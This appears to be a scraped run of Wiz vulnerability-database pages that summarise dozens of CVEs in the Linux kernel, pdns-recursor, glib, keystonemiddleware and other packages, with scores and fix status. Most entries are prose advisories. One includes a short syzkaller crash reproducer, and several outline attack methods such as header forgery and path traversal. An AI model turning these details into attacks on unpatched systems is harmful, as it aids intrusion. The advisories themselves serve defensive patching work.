The MOST I2C driver has been completely broken for five years without
anyone noticing so remove the driver from staging.
Specifically, commit 723de0f9171e ("staging: most: remove device from
interface structure") started requiring drivers to set the interface
device pointer before registration, but the I2C driver was never updated
which results in a NULL pointer dereference if anyone ever tries to
probe it.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2022-50765 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2022-50765 CVE-2022-50765 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50765 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
RISC-V: kexec: Fix memory leak of elf header buffer
This is reported by kmemleak detector:
unreferenced object 0xff2000000403d000 (size 4096):
comm "kexec", pid 146, jiffies 4294900633 (age 64.792s)
hex dump (first 32 bytes):
7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 .ELF............
04 00 f3 00 01 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
[] kmemleak_vmalloc+0x3c/0xbe
[] __vmalloc_node_range+0x3ac/0x560
[] __vmalloc_node+0x56/0x62
[] vzalloc+0x2c/0x34
[] crash_prepare_elf64_headers+0x80/0x30c
[] elf_kexec_load+0x3e8/0x4ec
[] kexec_image_load_default+0x40/0x4c
[] sys_kexec_file_load+0x1c4/0x322
[] ret_from_syscall+0x0/0x2
Wiz
CVE-2026-0397 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2026-0397 [LOW] CVE-2026-0397 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0397 :
Linux Debian vulnerability analysis and mitigation
When the internal webserver is enabled (default is disabled), an attacker might be able to trick an administrator logged to the dashboard into visiting a malicious website and extract information about the running configuration from the dashboard. The root cause of the issue is a misconfiguration of the Cross-Origin Resource Sharing (CORS) policy.
Source : NVD
## 3.1
Score
Published March 31, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11
Wiz
CVE-2026-32725 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-32725 [HIGH] CVE-2026-32725 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32725 :
Linux Debian vulnerability analysis and mitigation
SciTokens C++ is a minimal library for creating and using SciTokens from C or C++. Prior to version 1.4.1, scitokens-cpp is vulnerable to an authorization bypass when processing path-based scopes in tokens. The library normalizes the scope path from the token before authorization and collapses ".." path components instead of rejecting them. As a result, an attacker can use parent-directory traversal in the scope claim to broaden the effective authorization beyond the intended directory. This issue has been patched in version 1.4.1.
Source : NVD
## 8.3
Score
Published March 31, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV R
Wiz
CVE-2025-40905 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2025-40905 [HIGH] CVE-2025-40905 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40905 :
Linux Debian vulnerability analysis and mitigation
WWW::OAuth 1.000 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.
Source : NVD
## 7.3
Score
Published February 13, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libwww-oauth-perl
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Feb 15, 2026
Debian 13, 14 Severity HIGH Has Fix Added at: Feb 15, 2026
Echo Severity HIGH Has Fix Added at: Feb 15, 2026
## Ge
Wiz
CVE-2025-59029 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-59029 [MEDIUM] CVE-2025-59029 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59029 :
Linux Debian vulnerability analysis and mitigation
An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, then send a query with qtype set to ANY.
Source : NVD
## 5.3
Score
Published December 9, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.23 Severity MEDIUM Has Fix Added at: Dec 14, 2025
Alpine edge Severity MEDIUM Has Fix Added at: Dec 09, 2025
Debian 11, 12, 13 No Fix Added at: Dec 09, 2
Wiz
CVE-2026-23350 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23350 [HIGH] CVE-2026-23350 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23350 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/xe/queue: Call fini on exec queue creation fail
Every call to queue init should have a corresponding fini call.
Skipping this would mean skipping removal of the queue from GuC list
(which is part of guc_id allocation). A damaged queue stored in
exec_queue_lookup list would lead to invalid memory reference,
sooner or later.
Call fini to free guc_id. This must be done before any internal
LRCs are freed.
Since the finalization with this extra call became very similar to
__xe_exec_queue_fini(), reuse that. To make this reuse possible,
alter xe_lrc_put() so it can survive NULL parameters, like other
similar functions.
v2: Reuse _xe_exec_queue_fini
Wiz
CVE-2026-23438 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23438 CVE-2026-23438 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23438 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: mvpp2: guard flow control update with global_tx_fc in buffer switching
mvpp2_bm_switch_buffers() unconditionally calls
mvpp2_bm_pool_update_priv_fc() when switching between per-cpu and
shared buffer pool modes. This function programs CM3 flow control
registers via mvpp2_cm3_read()/mvpp2_cm3_write(), which dereference
priv->cm3_base without any NULL check.
When the CM3 SRAM resource is not present in the device tree (the
third reg entry added by commit 60523583b07c ("dts: marvell: add CM3
SRAM memory to cp11x ethernet device tree")), priv->cm3_base remains
NULL and priv->global_tx_fc is false. Any operation that triggers
mvpp2_bm_switch_buffers
Wiz
CVE-2026-2443 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2443 [MEDIUM] CVE-2026-2443 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2443 :
Linux Debian vulnerability analysis and mitigation
A flaw was identified in libsoup, a widely used HTTP library in GNOME-based systems. When processing specially crafted HTTP Range headers, the library may improperly validate requested byte ranges. In certain build configurations, this could allow a remote attacker to access portions of server memory beyond the intended response. Exploitation requires a vulnerable configuration and access to a server using the embedded SoupServer component.
Source : NVD
## 5.3
Score
Published February 13, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPS
Wiz
CVE-2025-71067 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-71067 CVE-2025-71067 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71067 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ntfs: set dummy blocksize to read boot_block when mounting
When mounting, sb->s_blocksize is used to read the boot_block without
being defined or validated. Set a dummy blocksize before attempting to
read the boot_block.
The issue can be triggered with the following syz reproducer:
mkdirat(0xffffffffffffff9c, &(0x7f0000000080)='./file1\x00', 0x0)
r4 = openat$nullb(0xffffffffffffff9c, &(0x7f0000000040), 0x121403, 0x0)
ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, &(0x7f0000000980)=0x4000)
mount(&(0x7f0000000140)=@nullb, &(0x7f0000000040)='./cgroup\x00',
&(0x7f0000000000)='ntfs3\x00', 0x2208004, 0x0)
syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0)
Here, the
Wiz
CVE-2026-27456 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-27456 [MEDIUM] CVE-2026-27456 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27456 :
Linux Debian vulnerability analysis and mitigation
util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing th
Wiz
CVE-2022-50837 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50837 [MEDIUM] CVE-2022-50837 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50837 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: dsa: tag_8021q: avoid leaking ctx on dsa_tag_8021q_register() error path
If dsa_tag_8021q_setup() fails, for example due to the inability of the
device to install a VLAN, the tag_8021q context of the switch will leak.
Make sure it is freed on the error path.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-5.15
linux-intel-iotg-5.15
Sources
NVD
Debian 12, 13,
Wiz
CVE-2026-2705 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2705 [MEDIUM] CVE-2026-2705 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2705 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was detected in Open Babel up to 3.1.1. The impacted element is the function OBAtom::SetFormalCharge in the library include/openbabel/atom.h of the component MOL2 File Handler. The manipulation results in out-of-bounds read. It is possible to launch the attack remotely. The exploit is now public and may be used. The patch is identified as e23a224b8fd9d7c2a7cde9ef4ec6afb4c05aa08a. A patch should be applied to remediate this issue. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 5.3
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit
Wiz
CVE-2025-6927 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2025-6927 [LOW] CVE-2025-6927 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6927 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/specials/pagers/BlockListPager.Php, includes/api/ApiQueryBlocks.Php.
This issue affects MediaWiki: from >= 1.42.0 before 1.39.13, 1.42.7 1.43.2, 1.44.0.
Source : NVD
## 2.3
Score
Published February 2, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Jul 03, 2025
Debian 13 Has Fix Added at: Jul 03, 2025
Debian 14 Ha
Wiz
CVE-2025-52204 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-52204 [MEDIUM] CVE-2025-52204 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-52204 :
Linux Debian vulnerability analysis and mitigation
A Cross-Site Scripting (XSS) vulnerability exists in Znuny::ITSM 6.5.x in the customer.pl endpoint via the OTRSCustomerInterface parameter
Source : NVD
## 6.1
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
znuny
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritiz
Wiz
CVE-2025-71221 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2025-71221 [HIGH] CVE-2025-71221 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71221 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: mmp_pdma: Fix race condition in mmp_pdma_residue()
Add proper locking in mmp_pdma_residue() to prevent use-after-free when
accessing descriptor list and descriptor contents.
The race occurs when multiple threads call tx_status() while the tasklet
on another CPU is freeing completed descriptors:
CPU 0 CPU 1
mmp_pdma_tx_status()
mmp_pdma_residue()
-> NO LOCK held
list_for_each_entry(sw, ..)
DMA interrupt
dma_do_tasklet()
-> spin_lock(&desc_lock)
list_move(sw->node, ...)
spin_unlock(&desc_lock)
| dma_pool_free(sw) access sw->desc 1).
Fix by protecting the chain_running list iteration and descriptor access
with the chan->desc_lock spinloc
Wiz
CVE-2026-4897 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4897 [MEDIUM] CVE-2026-4897 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4897 :
Linux Debian vulnerability analysis and mitigation
polkit-agent-helper-1
Source : NVD
## 5.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
polkit-debugsource
polkit-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploi
Wiz
CVE-2026-23372 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23372 [HIGH] CVE-2026-23372 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23372 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nfc: rawsock: cancel tx_work before socket teardown
In rawsock_release(), cancel any pending tx_work and purge the write
queue before orphaning the socket. rawsock_tx_work runs on the system
workqueue and calls nfc_data_exchange which dereferences the NCI
device. Without synchronization, tx_work can race with socket and
device teardown when a process is killed (e.g. by SIGKILL), leading
to use-after-free or leaked references.
Set SEND_SHUTDOWN first so that if tx_work is already running it will
see the flag and skip transmitting, then use cancel_work_sync to wait
for any in-progress execution to finish, and finally purge any
remaining queued skbs.
Wiz
CVE-2026-0988 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-0988 [LOW] CVE-2026-0988 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0988 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).
Source : NVD
## 3.7
Score
Published January 21, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.9
Exploitation Probability (EPSS) 0.1
Affec
Wiz
CVE-2026-0398 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-0398 [MEDIUM] CVE-2026-0398 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0398 :
Linux Debian vulnerability analysis and mitigation
Crafted zones can lead to increased resource usage and crafted CNAME chains can lead to cache poisoning in Recursor.
Source : NVD
## 5.3
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.23, edge Severity MEDIUM Has Fix Added at: Feb 11, 2026
Debian 11, 12 Severity MEDIUM No Fix Added at: Feb 10, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Feb 10, 2026
Echo Severity MEDIUM Has Fix Added
Wiz
CVE-2026-24027 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-24027 [MEDIUM] CVE-2026-24027 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24027 :
Linux Debian vulnerability analysis and mitigation
Crafted zones can lead to increased incoming network traffic.
Source : NVD
## 5.3
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.23, edge Severity MEDIUM Has Fix Added at: Feb 11, 2026
Debian 11, 12 Severity MEDIUM No Fix Added at: Feb 10, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Feb 10, 2026
Echo Severity MEDIUM Has Fix Added at: Feb 10, 2026
## Get a CVE risk assessment
Get
Wiz
CVE-2026-33554 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33554 [HIGH] CVE-2026-33554 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33554 :
Linux Debian vulnerability analysis and mitigation
ipmi-oem in FreeIPMI before 1.16.17 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface (IPMI) specification defines a set of interfaces for platform management. It is implemented by a large number of hardware manufacturers to support system management. It is most commonly used for sensor reading (e.g., CPU temperatures through the ipmi-sensors command within FreeIPMI) and remote power control (the ipmipower command). The ipmi-oem client command implements a set of a IPMI OEM commands for specific hardware vendors. If a user has supported hardware, they may wish to use the ipmi-oem command to send a request to a server to retrieve specific information. Three subcommands
Wiz
CVE-2025-71121 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71121 [MEDIUM] CVE-2025-71121 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71121 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
parisc: Do not reprogram affinitiy on ASP chip
The ASP chip is a very old variant of the GSP chip and is used e.g. in
HP 730 workstations. When trying to reprogram the affinity it will crash
with a HPMC as the relevant registers don't seem to be at the usual
location. Let's avoid the crash by checking the sversion. Also note,
that reprogramming isn't necessary either, as the HP730 is a just a
single-CPU machine.
Source : NVD
## 5.5
Score
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-33250 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33250 [HIGH] CVE-2026-33250 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33250 :
Linux Debian vulnerability analysis and mitigation
Freeciv21 is a free open source, turn-based, empire-building strategy game. Versions prior to 3.1.1 crash with a stack overflow when receiving specially-crafted packets. A remote attacker can use this to take down any public server. A malicious server can use this to crash the game on the player's machine. Authentication is not needed and, by default, logs do not contain any useful information. All users should upgrade to Freeciv21 version 3.1.1. Running the server behind a firewall can help mitigate the issue for non-public servers. For local games, Freeciv21 restricts connections to the current user and is therefore not affected.
Source : NVD
## 7.5
Score
Published March 24, 2026
Severity HIGH
CNA Score 7.5
Wiz
CVE-2026-23408 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23408 [HIGH] CVE-2026-23408 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23408 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: Fix double free of ns_name in aa_replace_profiles()
if ns_name is NULL after
1071 error = aa_unpack(udata, &lh, &ns_name);
and if ent->ns_name contains an ns_name in
1089 } else if (ent->ns_name) {
then ns_name is assigned the ent->ns_name
1095 ns_name = ent->ns_name;
however ent->ns_name is freed at
1262 aa_load_ent_free(ent);
and then again when freeing ns_name at
1270 kfree(ns_name);
Fix this by NULLing out ent->ns_name after it is transferred to ns_name
")
Source : NVD
## 7.8
Score
Published April 1, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV E
Wiz
CVE-2026-22797 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-22797 [CRITICAL] CVE-2026-22797 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22797 :
Linux Debian vulnerability analysis and mitigation
An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected.
Source : NVD
## 9.9
Score
Published January 19, 2026
Severity CRITICAL
CNA Score 9.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release
Wiz
CVE-2026-23288 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23288 [HIGH] CVE-2026-23288 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23288 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix out-of-bounds memset in command slot handling
The remaining space in a command slot may be smaller than the size of
the command header. Clearing the command header with memset() before
verifying the available slot space can result in an out-of-bounds write
and memory corruption.
Fix this by moving the memset() call after the size validation.
Source : NVD
## 7.8
Score
Published March 25, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probabili
Wiz
CVE-2026-27895 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27895 [MEDIUM] CVE-2026-27895 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27895 :
Linux Debian vulnerability analysis and mitigation
LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, the PDF export component does not correctly validate uploaded file extensions. This way any file type (including .php files) can be uploaded. With GHSA-w7xq-vjr3-p9cf, an attacker can achieve remote code execution as the web server user. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user.
Source : NVD
## 8.8
Score
Published March 18, 2026
Severity HIGH
CNA Score 4.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Expl
Wiz
CVE-2022-50725 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2022-50725 CVE-2022-50725 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50725 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: vidtv: Fix use-after-free in vidtv_bridge_dvb_init()
KASAN reports a use-after-free:
BUG: KASAN: use-after-free in dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core]
Call Trace:
...
dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core]
vidtv_bridge_probe+0x7bf/0xa40 [dvb_vidtv_bridge]
platform_probe+0xb6/0x170
...
Allocated by task 1238:
...
dvb_register_device+0x1a7/0xa70 [dvb_core]
dvb_dmxdev_init+0x2af/0x4a0 [dvb_core]
vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge]
...
Freed by task 1238:
dvb_register_device+0x6d2/0xa70 [dvb_core]
dvb_dmxdev_init+0x2af/0x4a0 [dvb_core]
vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge]
...
It is because the error handling i
Wiz
CVE-2025-40931 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2025-40931 [CRITICAL] CVE-2025-40931 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40931 :
Linux Debian vulnerability analysis and mitigation
Apache::Session::Generate::MD5 versions through 1.94 for Perl create insecure session id.
Apache::Session::Generate::MD5 generates session ids insecurely. The default session id generator returns a MD5 hash seeded with the built-in rand() function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage. Predicable session ids could allow an attacker to gain access to systems.
Source : NVD
## 9.1
Score
Published March 5, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit N
Wiz
CVE-2026-26345 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-26345 [HIGH] CVE-2026-26345 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26345 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.8 contains a stored cross-site scripting (XSS) vulnerability in the public area triggered in certain edge-case usage patterns. The echapper_html_suspect() function does not adequately sanitize user-controlled content, allowing authenticated users with content-editing privileges (e.g., author-level roles and above) to inject malicious scripts. The injected payload may be rendered across multiple pages within the framework and execute in the browser context of other users, including administrators. Successful exploitation can allow attackers to perform actions in the security context of the victim user, including unauthorized modification of application state. This vulnerability is not mitigated by the S
Wiz
CVE-2026-23424 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23424 [MEDIUM] CVE-2026-23424 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23424 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Validate command buffer payload count
The count field in the command header is used to determine the valid
payload size. Verify that the valid payload does not exceed the remaining
buffer space.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fips
linux-fips
Sources
NVD
Debian 14 Has Fix Added at: Apr 05, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIU
Wiz
CVE-2016-20041 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2016-20041 [HIGH] CVE-2016-20041 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20041 :
Echo vulnerability analysis and mitigation
Yasr 0.6.9-5 contains a buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized argument to the -p parameter. Attackers can invoke yasr with a crafted payload containing junk data, shellcode, and a return address to overwrite the stack and trigger code execution.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
yasr
Sources
NVD
Echo Severity HIGH No Fix Added at: Mar
Wiz
CVE-2025-68370 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68370 [MEDIUM] CVE-2025-68370 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68370 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
coresight: tmc: add the handle of the event to the path
The handle is essential for retrieving the AUX_EVENT of each CPU and is
required in perf mode. It has been added to the coresight_path so that
dependent devices can access it from the path when needed.
The existing bug can be reproduced with:
